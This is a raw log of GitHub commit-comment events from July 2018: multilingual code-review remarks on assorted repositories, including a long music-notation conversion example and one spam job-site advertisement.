{"id":"7987496252","type":"CommitCommentEvent","actor":{"login":"willem179"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":29760557,"position":null,"line":null,"path":null,"commit_id":"48356a3244425e9badf253842790a7833eab10c8","created_at":"2018-07-19T08:00:10Z","updated_at":"2018-07-19T08:00:10Z","author_association":"NONE","body":"Using MSVC 2015 makes it difficult (impossible) to use Wrye Bash with Wine versions less than 2.0. (because installing Vcrun2015 fails on the appartment thread model)\r\nI use Wine 1.6.2 (Ubuntu 16.04 LTS) and have to revert this patch or recompile CBash (which I can't) or use the -P option.\r\nI thought it was good practice to compile Python extensions with the same MSVC version as the one used for the Python version (CPython 2.7 uses Visual C++ 9.0, https://wiki.python.org/moin/WindowsCompilers)"}},"created_at":"2018-07-19T08:00:10Z"}
{"id":"7987496475","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29760558,"position":288,"line":288,"path":"lib/node_modules/@stdlib/stats/incr/mvmr/test/test.js","commit_id":"b331e5634fe726ff0e16e87814ac3f85d8164d31","created_at":"2018-07-19T08:00:13Z","updated_at":"2018-07-19T08:00:13Z","author_association":"MEMBER","body":"Should be `may not always`. Will change."}},"created_at":"2018-07-19T08:00:13Z"}
{"id":"7987497705","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760561,"position":16,"line":12,"path":"Lesson1/the_weight.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T08:00:26Z","updated_at":"2018-07-19T08:00:26Z","author_association":"OWNER","body":"ясно. был похожий момент выше."}},"created_at":"2018-07-19T08:00:26Z"}
{"id":"7987498925","type":"CommitCommentEvent","actor":{"login":"PangJaehun"},"repo":{"name":"gangnamjava/java-example"},"payload":{"comment":{"id":29760563,"position":null,"line":null,"path":null,"commit_id":"571b46abe22fd839d6d1344aded4ba0e9977e263","created_at":"2018-07-19T08:00:40Z","updated_at":"2018-07-19T08:00:40Z","author_association":"NONE","body":"컨벤션 읽어보고 알았어요ㅋㅋ"}},"created_at":"2018-07-19T08:00:40Z"}
{"id":"7987502307","type":"CommitCommentEvent","actor":{"login":"proyoun83"},"repo":{"name":"mousesd/GagaoTalk"},"payload":{"comment":{"id":29760570,"position":4,"line":18,"path":"JSH/GagaoTalk/app/src/main/res/layout/activity_main.xml","commit_id":"eb690ff0e3b956bd370e532e6f70ec28d73d7383","created_at":"2018-07-19T08:01:21Z","updated_at":"2018-07-19T08:01:21Z","author_association":"COLLABORATOR","body":"썼어요~"}},"created_at":"2018-07-19T08:01:21Z"}
{"id":"7987503007","type":"CommitCommentEvent","actor":{"login":"larrylawl"},"repo":{"name":"larrylawl/AutomaticTimetableGenerator"},"payload":{"comment":{"id":29760572,"position":null,"line":null,"path":null,"commit_id":"a38f758400371da69297d7c5046f846c07112cba","created_at":"2018-07-19T08:01:30Z","updated_at":"2018-07-19T08:01:30Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-19T08:01:30Z"}
{"id":"7987503241","type":"CommitCommentEvent","actor":{"login":"proyoun83"},"repo":{"name":"mousesd/GagaoTalk"},"payload":{"comment":{"id":29760573,"position":8,"line":22,"path":"JSH/GagaoTalk/app/src/main/res/layout/activity_main.xml","commit_id":"eb690ff0e3b956bd370e532e6f70ec28d73d7383","created_at":"2018-07-19T08:01:33Z","updated_at":"2018-07-19T08:01:33Z","author_association":"COLLABORATOR","body":"여기가 중요해요."}},"created_at":"2018-07-19T08:01:33Z"}
{"id":"7987505777","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18012/programming-term2"},"payload":{"comment":{"id":29760576,"position":null,"line":null,"path":null,"commit_id":"ac8e06d14517276e254f5fdf9a2530ea56ebd578","created_at":"2018-07-19T08:02:04Z","updated_at":"2018-07-19T08:02:04Z","author_association":"NONE","body":"あと、辞書型の定義の部分が横に長いので、適宜折り返しましょう。\r\n講義中にも触れたけど、可読性を下げてしまいます。"}},"created_at":"2018-07-19T08:02:04Z"}
{"id":"7987510935","type":"CommitCommentEvent","actor":{"login":"EshalKhan"},"repo":{"name":"klcodanr/Jekyll-Disqus-Forum"},"payload":{"comment":{"id":29760583,"position":null,"line":null,"path":null,"commit_id":"51a5aa03c439e57cedfebb68a4ac893782b392d6","created_at":"2018-07-19T08:03:11Z","updated_at":"2018-07-19T08:03:11Z","author_association":"NONE","body":"PakistanJobs.pk provides you latest classified ad jobs, newspaper jobs, jobs from employers direct. \r\nhttp://www.pakistanjobs.pk/"}},"created_at":"2018-07-19T08:03:11Z"}
{"id":"7987511441","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760585,"position":17,"line":13,"path":"Lesson1/the_weight.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T08:03:17Z","updated_at":"2018-07-19T08:03:17Z","author_association":"OWNER","body":"тут на самом деле нужны еще доп. ограничения в виде возраста , пола..вида..\r\nдаже карлик не может быть весом в кило.\r\nне обсуждаю тему на число в возрасте = 110.001 кг\r\nв общем закрыли тему.. суть не в этом\r\n"}},"created_at":"2018-07-19T08:03:17Z"}
{"id":"7987513463","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760591,"position":22,"line":18,"path":"Lesson1/the_weight.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T08:03:42Z","updated_at":"2018-07-19T08:03:42Z","author_association":"OWNER","body":"да"}},"created_at":"2018-07-19T08:03:42Z"}
{"id":"7987515837","type":"CommitCommentEvent","actor":{"login":"Kalengo"},"repo":{"name":"Kalengo/Recruitment"},"payload":{"comment":{"id":29760595,"position":6,"line":13,"path":"README.md","commit_id":"e39de15ef9e5edced4d4607209aab5a342ee2aae","created_at":"2018-07-19T08:04:12Z","updated_at":"2018-07-19T08:04:12Z","author_association":"OWNER","body":"致力于推进“有意思的科技金融”体验，从用户角度出发，由专注于纯懒人式投资场景升级过度为享受财富增长的美好生活场景。"}},"created_at":"2018-07-19T08:04:12Z"}
{"id":"7987516656","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29760600,"position":288,"line":288,"path":"lib/node_modules/@stdlib/stats/incr/mvmr/test/test.js","commit_id":"b331e5634fe726ff0e16e87814ac3f85d8164d31","created_at":"2018-07-19T08:04:23Z","updated_at":"2018-07-19T08:04:23Z","author_association":"MEMBER","body":"Done."}},"created_at":"2018-07-19T08:04:23Z"}
{"id":"7987517071","type":"CommitCommentEvent","actor":{"login":"thejibz"},"repo":{"name":"thejibz/swagger-to-graphql"},"payload":{"comment":{"id":29760601,"position":null,"line":null,"path":null,"commit_id":"0fd2478cf3711658c72b8d25f392c99329553d6b","created_at":"2018-07-19T08:04:29Z","updated_at":"2018-07-19T08:04:29Z","author_association":"OWNER","body":"Fix in the right place for #77 (in 'src' instead of 'lib')"}},"created_at":"2018-07-19T08:04:29Z"}
{"id":"7987518988","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29760602,"position":null,"line":null,"path":null,"commit_id":"ed8f4f512baac2e0a3aa8d152825aa1fb62886e6","created_at":"2018-07-19T08:04:53Z","updated_at":"2018-07-19T08:04:53Z","author_association":"CONTRIBUTOR","body":"This commit allows for placing dynamics below the grand staff in the humdrum-to-mei converter (see issue https://github.com/humdrum-tools/verovio-humdrum-viewer/issues/131)\r\n\r\nExample:\r\n\r\n```\r\n**kern\t**kern\t**dynam\r\n*clefF4\t*clefG2\t*\r\n!\t!\t!LO:DY:a\r\n1r\t1cc\tp\r\n=\t=\t=\r\n!\t!\t!LO:DY:b=2\r\n1c\t1dd\tpp\r\n!\t!\t!LO:HP:b=2\r\n.\t.\t<\r\n=\t=\t=\r\n1B\t1ee\t.\r\n=\t=\t=\r\n1A\t1ff\t[[\r\n=\t=\t=\r\n!\t!\t!LO:HP:b=2\r\n1G\t1gg\t>\r\n=\t=\t=\r\n*\t*\t*below:2\r\n!\t!\t!LO:DY:a\r\n1r\t1cc\tf\r\n=\t=\t=\r\n1c\t1dd\tff\r\n.\t.\t>\r\n=\t=\t=\r\n1B\t1ee\t.\r\n=\t=\t=\r\n1A\t1ff\t]]\r\n=\t=\t=\r\n1G\t1gg\t<\r\n=\t=\t=\r\n*-\t*-\t*-\r\n```\r\n\r\nRendering:\r\n\r\n<img width=\"1032\" alt=\"screen shot 2018-07-19 at 10 04 12 am\" src=\"https://user-images.githubusercontent.com/3487289/42929661-03ec247c-8b3b-11e8-8735-d27560657326.png\">\r\n\r\nMEI conversion\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-19T10:04:46\" version=\"2.0.0-dev-9b4f756\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001430727200\">\r\n                <score xml:id=\"score-0000000857654941\">\r\n                    <scoreDef xml:id=\"scoredef-0000001200386274\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000000890508695\" symbol=\"brace\" barthru=\"true\">\r\n                            <staffDef xml:id=\"staffdef-0000001995436958\" clef.shape=\"G\" clef.line=\"2\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001167807495\" />\r\n                            </staffDef>\r\n                            <staffDef xml:id=\"staffdef-0000001866832597\" clef.shape=\"F\" clef.line=\"4\" n=\"2\" lines=\"5\" />\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L1\" n=\"0\">\r\n                            <staff xml:id=\"staff-0000002126088705\" n=\"1\">\r\n                                <layer xml:id=\"layer-L1F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L4F2\" dur=\"1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-0000001192462502\" n=\"2\">\r\n                                <layer xml:id=\"layer-L1F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L4F1\" dur=\"1\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dynam xml:id=\"dynam-L4F3\" place=\"above\" staff=\"1\" tstamp=\"1.000000\" vgrp=\"100\">p</dynam>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L5\">\r\n                            <staff xml:id=\"staff-L5F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L5F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L7F2\" dur=\"1\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L5F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L5F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L7F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dynam xml:id=\"dynam-L7F3\" place=\"below\" staff=\"2\" tstamp=\"1.000000\" vgrp=\"100\">pp</dynam>\r\n                            <hairpin xml:id=\"hairpin-L9F3\" staff=\"2\" tstamp=\"3.000000\" tstamp2=\"2m+5.0\" form=\"cres\" place=\"below\" vgrp=\"100\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L10\">\r\n                            <staff xml:id=\"staff-L10F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L10F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L11F2\" dur=\"1\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L10F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L10F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L11F1\" dur=\"1\" oct=\"3\" pname=\"b\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L12\">\r\n                            <staff xml:id=\"staff-L12F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L12F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L13F2\" dur=\"1\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L12F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L12F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L13F1\" dur=\"1\" oct=\"3\" pname=\"a\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L14\">\r\n                            <staff xml:id=\"staff-L14F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L14F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L16F2\" dur=\"1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L14F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L14F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L16F1\" dur=\"1\" oct=\"3\" pname=\"g\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L16F3\" staff=\"2\" tstamp=\"1.000000\">decresc.</dir>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L17\">\r\n                            <staff xml:id=\"staff-L17F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L17F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L20F2\" dur=\"1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L17F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L17F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L20F1\" dur=\"1\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dynam xml:id=\"dynam-L20F3\" place=\"above\" staff=\"1\" tstamp=\"1.000000\" vgrp=\"100\">f</dynam>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L21\">\r\n                            <staff xml:id=\"staff-L21F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L21F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L22F2\" dur=\"1\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L21F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L21F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L22F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dynam xml:id=\"dynam-L22F3\" place=\"below\" staff=\"2\" tstamp=\"1.000000\" vgrp=\"100\">ff</dynam>\r\n                            <hairpin xml:id=\"hairpin-L23F3\" staff=\"2\" tstamp=\"3.000000\" tstamp2=\"2m+5.0\" form=\"dim\" vgrp=\"100\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L24\">\r\n                            <staff xml:id=\"staff-L24F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L24F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L25F2\" dur=\"1\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L24F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L24F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L25F1\" dur=\"1\" oct=\"3\" pname=\"b\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L26\">\r\n                            <staff xml:id=\"staff-L26F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L26F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L27F2\" dur=\"1\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L26F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L26F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L27F1\" dur=\"1\" oct=\"3\" pname=\"a\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L28\">\r\n                            <staff xml:id=\"staff-L28F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L28F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L29F2\" dur=\"1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L28F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L28F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L29F1\" dur=\"1\" oct=\"3\" pname=\"g\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L29F3\" staff=\"2\" tstamp=\"1.000000\">cresc.</dir>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n"}},"created_at":"2018-07-19T08:04:53Z"}
{"id":"7987519840","type":"CommitCommentEvent","actor":{"login":"afraag"},"repo":{"name":"CompleteBlenderCreator/01-Introduction-And-Setup"},"payload":{"comment":{"id":29760605,"position":null,"line":null,"path":null,"commit_id":"06130d268e8c6f33cd3bd8379e1cb4ff21595b31","created_at":"2018-07-19T08:05:04Z","updated_at":"2018-07-19T08:05:04Z","author_association":"NONE","body":"hi every one "}},"created_at":"2018-07-19T08:05:04Z"}
{"id":"7987520565","type":"CommitCommentEvent","actor":{"login":"courtchao"},"repo":{"name":"hrsf99-Expressel/expressel-item-gallery-service"},"payload":{"comment":{"id":29760606,"position":null,"line":null,"path":null,"commit_id":"812f42d14699d05832ce20bd2e51921ee78c45de","created_at":"2018-07-19T08:05:12Z","updated_at":"2018-07-19T08:05:12Z","author_association":"NONE","body":"@cdl08001 \r\n\r\nWill spend more time looking over it in depth/writing inline comments tomorrow, but first off great job getting it all setup, it looks fantastic! I especially love how clear everything is and your documentation via comments, it's super helpful. Here are a few things to consider--\r\n\r\n- Separation of concerns-- the dummy data generation and database creation might be more clear if split, helper functions within the larger functions may be helpful too but it's pretty clear as is\r\n-  Potentially look into using blobs for storing images, found these links?\r\n  https://dev.mysql.com/doc/refman/8.0/en/blob.html\r\n  https://www.tutorialspoint.com/What-is-BLOB-data-type-in-MySQL\r\n-  Any particular reason why all items will have 2 colors? Can have null values, though it's optional of course\r\n- Any particular reason for using faker.fake instead of faker.hacker/faker.lorem/etc? From my understanding faker.fake is mostly for when you want to combine multiple faker items together, like creating a full name out of first name + last name or having an address made out of many parts\r\n- Is Item_Lowest_Price from line 36 supposed to be a boolean? If so it can be stored as 1 or 0 to be true or false"}},"created_at":"2018-07-19T08:05:12Z"}
{"id":"7987523077","type":"CommitCommentEvent","actor":{"login":"colemanchris77"},"repo":{"name":"pyvec/naucse.python.cz"},"payload":{"comment":{"id":29760613,"position":84,"line":99,"path":"test_naucse/test_views_utils.py","commit_id":"6e656c51536c14e4da4bc09c0e9cc3ca0522bb0e","created_at":"2018-07-19T08:05:43Z","updated_at":"2018-07-19T08:05:43Z","author_association":"NONE","body":"Christopher Michael Edward Coleman"}},"created_at":"2018-07-19T08:05:43Z"}
{"id":"7987531994","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29760629,"position":127,"line":127,"path":"lib/node_modules/@stdlib/stats/incr/mmeanvar/lib/main.js","commit_id":"72b0cab6fdab2e6316a290618a0a55fd6dad5e66","created_at":"2018-07-19T08:07:37Z","updated_at":"2018-07-19T08:07:37Z","author_association":"MEMBER","body":"That sounds like an issue with your editor. Its usage is fine here, as it is a function parameter and thus locally scoped, meaning there is no risk of reassigning the global `window` variable which is **only** available in browser contexts."}},"created_at":"2018-07-19T08:07:37Z"}
{"id":"7987539548","type":"CommitCommentEvent","actor":{"login":"KimEunYeol"},"repo":{"name":"KimEunYeol/OpensourceProject"},"payload":{"comment":{"id":29760643,"position":null,"line":null,"path":null,"commit_id":"9b28461096716fd92a813744b8b5af2f1ac2af61","created_at":"2018-07-19T08:09:11Z","updated_at":"2018-07-19T08:09:11Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-19T08:09:11Z"}
{"id":"7987539965","type":"CommitCommentEvent","actor":{"login":"jsfan3"},"repo":{"name":"codenameone/CodenameOne"},"payload":{"comment":{"id":29760644,"position":null,"line":null,"path":null,"commit_id":"86fea99196dd5a453988ede8217e0809e529469a","created_at":"2018-07-19T08:09:17Z","updated_at":"2018-07-19T08:09:17Z","author_association":"CONTRIBUTOR","body":"Thank you very much. I tested it on the iPhone X skin in the Simulator.\r\nThe only (small) issue is about the back button: if I click on it, I see the toolbar without the search bar, instead I want to show the previous form (I used the setBackCommand). So, at the moment, the user needs to click on the back button of the search bar and then on the back button of the toolbar to go to the previous form. Is it possible to go to the previous form directly?"}},"created_at":"2018-07-19T08:09:17Z"}
{"id":"7987540256","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29760645,"position":74,"line":74,"path":"lib/node_modules/@stdlib/stats/incr/mpcorr2/test/test.js","commit_id":"e6bc812ab63010afd0f25418c0c6954c3a680357","created_at":"2018-07-19T08:09:20Z","updated_at":"2018-07-19T08:09:20Z","author_association":"MEMBER","body":"Okay. Done."}},"created_at":"2018-07-19T08:09:20Z"}
{"id":"7987540749","type":"CommitCommentEvent","actor":{"login":"ppdmc"},"repo":{"name":"ppdmc/interface"},"payload":{"comment":{"id":29760649,"position":78,"line":78,"path":"Program.cs","commit_id":"f140deae0951c2adabad570ce770445f53d21e75","created_at":"2018-07-19T08:09:26Z","updated_at":"2018-07-19T08:09:26Z","author_association":"OWNER","body":"76~78 IListable 멤버 구현\r\n"}},"created_at":"2018-07-19T08:09:26Z"}
{"id":"7987540880","type":"CommitCommentEvent","actor":{"login":"deerboy"},"repo":{"name":"Update-hub/update-app"},"payload":{"comment":{"id":29760650,"position":17,"line":15,"path":"src/components/UserList.js","commit_id":"cb0082ad1d7b1bfaa7e68afdb67f5b83a020b933","created_at":"2018-07-19T08:09:28Z","updated_at":"2018-07-19T08:09:28Z","author_association":"CONTRIBUTOR","body":"データの使い方はこの辺参照"}},"created_at":"2018-07-19T08:09:28Z"}
{"id":"7987544671","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29760655,"position":3,"line":3,"path":"1.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:10:15Z","updated_at":"2018-07-19T08:10:15Z","author_association":"NONE","body":"Легче будет читаться, если не будет пустых строк между строкой где спрашивается имя и строкой где оно записывается. Эти вещи связаны по смыслу и легче воспринимаются вместе"}},"created_at":"2018-07-19T08:10:15Z"}
{"id":"7987546828","type":"CommitCommentEvent","actor":{"login":"ppdmc"},"repo":{"name":"ppdmc/interface"},"payload":{"comment":{"id":29760659,"position":40,"line":40,"path":"Program.cs","commit_id":"f140deae0951c2adabad570ce770445f53d21e75","created_at":"2018-07-19T08:10:40Z","updated_at":"2018-07-19T08:10:40Z","author_association":"OWNER","body":"36~39 IListable 멤버 구현"}},"created_at":"2018-07-19T08:10:40Z"}
{"id":"7987546953","type":"CommitCommentEvent","actor":{"login":"js1688"},"repo":{"name":"350078238/cat"},"payload":{"comment":{"id":29760660,"position":null,"line":null,"path":null,"commit_id":"25de25e3568a65c1cadbf37f914a5d441dfa0ff6","created_at":"2018-07-19T08:10:42Z","updated_at":"2018-07-19T08:10:42Z","author_association":"NONE","body":"我做这个起初的想法只是想实时webrtc,并不会考虑兼容性,只要固定的条件上能运行就可以了,在其他浏览器是运行不起来的,起初在开发的时候  windows + tomcat8.0+谷歌浏览器 一对一能很稳定的运行,多人聊天开多了窗口会有某些窗口掉socket的情况,以及cpu占用率暴涨。近期有人跟我反馈打开第二个窗口时与第一个窗口建立了视频聊天后会导致发起方断开websocket,我自己测试了一下确实有这个情况"}},"created_at":"2018-07-19T08:10:42Z"}
{"id":"7987549624","type":"CommitCommentEvent","actor":{"login":"SoGhost"},"repo":{"name":"SoGhost/Unity_Study_Notes"},"payload":{"comment":{"id":29760665,"position":null,"line":null,"path":null,"commit_id":"a9660f181ed565d802efab16c156069d554ad41f","created_at":"2018-07-19T08:11:16Z","updated_at":"2018-07-19T08:11:16Z","author_association":"OWNER","body":"laji"}},"created_at":"2018-07-19T08:11:16Z"}
{"id":"7987550527","type":"CommitCommentEvent","actor":{"login":"lipengg"},"repo":{"name":"NPLPackages/main"},"payload":{"comment":{"id":29760666,"position":4,"line":39,"path":"script/ide/System/Windows/Controls/EditBox.lua","commit_id":"938e1d396253e2468a65dc4bcb4faae1b7809025","created_at":"2018-07-19T08:11:29Z","updated_at":"2018-07-19T08:11:29Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-19T08:11:29Z"}
{"id":"7987550830","type":"CommitCommentEvent","actor":{"login":"ncave"},"repo":{"name":"fable-compiler/Fable"},"payload":{"comment":{"id":29760668,"position":null,"line":null,"path":null,"commit_id":"15aa796f7299c51e9271715ae2f34843c3777ba7","created_at":"2018-07-19T08:11:32Z","updated_at":"2018-07-19T08:11:32Z","author_association":"COLLABORATOR","body":"@alfonsogarciacaro Is webpack not working for you? See #1491 for update."}},"created_at":"2018-07-19T08:11:32Z"}
{"id":"7987552879","type":"CommitCommentEvent","actor":{"login":"ppdmc"},"repo":{"name":"ppdmc/interface"},"payload":{"comment":{"id":29760671,"position":92,"line":92,"path":"Program.cs","commit_id":"f140deae0951c2adabad570ce770445f53d21e75","created_at":"2018-07-19T08:12:00Z","updated_at":"2018-07-19T08:12:00Z","author_association":"OWNER","body":"80~91 표시를 위한 ColumValues / string으로 return값을 던진다."}},"created_at":"2018-07-19T08:12:00Z"}
{"id":"7987555005","type":"CommitCommentEvent","actor":{"login":"mrchypark"},"repo":{"name":"danbi-ncsoft/timesuperin"},"payload":{"comment":{"id":29760680,"position":null,"line":null,"path":null,"commit_id":"2fef6fa48299e597981e4ce082283180e972b2ef","created_at":"2018-07-19T08:12:25Z","updated_at":"2018-07-19T08:12:25Z","author_association":"NONE","body":"Thank you all this work!"}},"created_at":"2018-07-19T08:12:25Z"}
{"id":"7987557545","type":"CommitCommentEvent","actor":{"login":"AntonioKokoshka"},"repo":{"name":"AntonioKokoshka/GPWAnalytics"},"payload":{"comment":{"id":29760682,"position":null,"line":null,"path":null,"commit_id":"3edf06b127239372e80a2f99d943412058d53e1d","created_at":"2018-07-19T08:12:58Z","updated_at":"2018-07-19T08:12:58Z","author_association":"OWNER","body":"style"}},"created_at":"2018-07-19T08:12:58Z"}
{"id":"7987558381","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29760683,"position":9,"line":9,"path":"1.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:13:09Z","updated_at":"2018-07-19T08:13:09Z","author_association":"NONE","body":"Сразу привыкаем давать переменным и методам говорящие имена. Это упрощает понимание намерения кода. Тут можно назвать переменную не \"а\", а \"ideal_weight\" например"}},"created_at":"2018-07-19T08:13:09Z"}
{"id":"7987561310","type":"CommitCommentEvent","actor":{"login":"ale5000-git"},"repo":{"name":"videolan/vlc"},"payload":{"comment":{"id":29760688,"position":24,"line":1749,"path":"src/input/es_out.c","commit_id":"cfea200c8c7596de07d9e4b7bb88f993015939be","created_at":"2018-07-19T08:13:45Z","updated_at":"2018-07-19T08:13:45Z","author_association":"NONE","body":"@tguillem\r\nIf I'm not wrong this will not bypass the check at line [1769](https://github.com/videolan/vlc/commit/cfea200c8c7596de07d9e4b7bb88f993015939be#diff-c7d9d39cd6675475e8f8a9362ae9a25dR1769)."}},"created_at":"2018-07-19T08:13:45Z"}
